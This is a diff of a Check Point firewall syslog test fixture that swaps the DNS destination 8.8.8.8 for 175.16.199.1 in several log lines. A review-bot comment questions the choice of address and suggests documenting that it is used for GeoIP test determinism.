 <134>1 2020-03-29T18:13:34Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e550,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T18:13:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e550,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; 
src:"192.168.1.100"] 
@@ -3751,7 +3751,7 @@
 <134>1 2020-03-29T18:16:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e605,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64052"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10194"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T18:16:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e605,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43344"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:16:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e605,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51368"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10195"; xlatesrc:"0.0.0.0"]
-<134>1 2020-03-29T18:17:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e62d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45816"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:17:17Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e62d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; 
rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45816"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:17:19Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e62e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:17:21Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e633,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T18:17:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e633,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; 
originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] 
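Review bot: The replacement address `175.16.199.1` on the added lines is a publicly routable address rather than one from an RFC 5737 documentation range, and the other external endpoints in the same hunk (`192.124.249.41`, `192.124.249.31`) keep their original values, so the swap away from `8.8.8.8` reads as selective rather than as a sanitisation of the fixture. If the intent is to pin a destination that resolves in the GeoIP database used by the module's pipeline tests so the expected output is deterministic, that rationale is worth recording next to the fixture, e.g. in the module test README: `175.16.199.1 is used because it resolves in the test GeoIP database; 8.8.8.8 does not.` The same substitution is made in the hunks at -3762 and -3775, and in the one starting at -3815, which runs past this chunk.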
@@ -3762,7 +3762,7 @@
 <134>1 2020-03-29T18:18:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e67d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57674"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:18:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e67d,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36102"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10196"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T18:18:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e67d,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; 
__policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43976"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:18:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e682,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43177"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T18:18:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e682,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43177"; 
service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:18:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e682,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64112"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10197"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T18:18:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e682,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48118"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:18:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e682,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; 
sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"64114"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10198"; xlatesrc:"0.0.0.0"] 
@@ -3775,12 +3775,12 @@
 <134>1 2020-03-29T18:19:48Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e6c5,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T18:19:49Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e6c5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:19:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80e6c7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:20:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6e5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49163"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:20:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6e5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506021"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47088"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:20:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6e5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49163"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T18:20:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6e5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585506021"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47088"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:20:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6e5,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.55.116"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58824"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:20:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6e8,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"129.250.35.250"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47847"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:20:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6ef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506031"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"37391"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T18:20:31Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80e6ef,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585506031"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56970"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
